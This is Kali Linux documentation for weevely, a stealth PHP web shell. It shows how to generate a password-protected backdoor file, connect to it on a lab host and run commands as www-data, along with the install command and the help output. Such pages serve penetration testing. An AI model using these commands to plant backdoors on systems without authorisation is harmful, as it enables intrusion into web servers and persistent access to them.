Tool Documentation:
weevely Usage Example
Generate a PHP backdoor (generate) protected with the given password (s3cr3t).
root@kali:~# weevely generate s3cr3t
[generate.php] Backdoor file 'weevely.php' created with password 's3cr3t'
root@kali:~# weevely http://192.168.1.202/weevely.php s3cr3t
________ __
| | | |----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|____|____|___/|____|__|___ | v1.1
|_____|
Stealth tiny web shell
[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.1.202/weevely.session'
www-data@kali:/var/www $ uname
Linux
www-data@kali:/var/www $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Packages and Binaries:
weevely
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
Installed size: 899 KB
How to install: sudo apt install weevely
Dependencies:
- python3
- python3-dateutil
- python3-mako
- python3-prettytable
- python3-socks
- python3-yaml
weevely
Weaponized web shell
root@kali:~# weevely -h
usage: weevely [-h] {terminal,session,generate} ...
positional arguments:
{terminal,session,generate}
terminal Run terminal or command on the target
session Recover an existing session
generate Generate new agent
options:
-h, --help show this help message and exit
Updated on: 2024-May-28